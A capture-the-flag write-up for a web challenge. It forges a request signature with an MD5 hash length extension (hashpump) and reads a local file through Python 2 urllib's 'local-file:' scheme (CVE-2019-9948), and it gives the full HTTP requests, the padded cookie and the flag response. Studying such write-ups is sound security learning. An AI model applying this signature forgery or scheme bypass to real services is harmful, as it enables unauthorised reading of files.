Hash Length Extension Attack + CVE-2019-9948 (urllib)
The challenge code defines two actions, scan and read. Both are authenticated with a sign computed as md5(secert_key + param + action), and the /geneSign endpoint only returns the sign for the scan action. The param is opened with urllib, and the local-file: scheme is CVE-2019-9948: Python 2's urllib maps a local_file URL (a '-' in the scheme becomes '_') to its local file opener, so a blacklist that only matches file: does not catch it.

First, get the sign value for the scan action:

GET /geneSign?param=local-file:flag.txt HTTP/1.1
Host: 139.180.128.86

HTTP/1.1 200 OK
Server: nginx/1.15.8
Content-Length: 32
Connection: close

51796b52dd6e1108c89b7d5277d3ae0a
Next, use hashpump to generate a new sign whose signed data contains both the scan and read actions. The signed data is param + action, i.e. local-file:flag.txtscan, and the secret key is 16 bytes long, so the padding is computed for a 39-byte message:

$ hashpump
Input Signature: 51796b52dd6e1108c89b7d5277d3ae0a
Input Data: local-file:flag.txtscan
Input Key Length: 16
Input Data to Add: read
eafd6ccd634ec29886babc843f1d8b86
local-file:flag.txtscan\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00read

The first output line is the new sign; the second is the extended data (original data, MD5 padding, then the appended read).
Keep param unchanged and put the rest of the extended data (scan, the padding bytes and read) in the action cookie, replacing each \x with % so the raw bytes survive the server's URL decoding. Since the server checks "scan" in action and "read" in action as substrings, the padded action triggers both: scan writes the file contents to the result file and read returns them. Submit the new sign alongside it:

GET /De1ta?param=local-file:flag.txt HTTP/1.1
Host: 139.180.128.86
Cookie:action=scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%008%01%00%00%00%00%00%00read;sign=eafd6ccd634ec29886babc843f1d8b86
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.15.8
Content-Type: text/html; charset=utf-8
Content-Length: 65
Connection: close

{"code": 200, "data": "de1ctf{27782fcffbb7d00309a93bc49b74ca26}"}
Due to my carelessness, sorry about the unexpected solution of this challenge. Hope you have a great time in the game.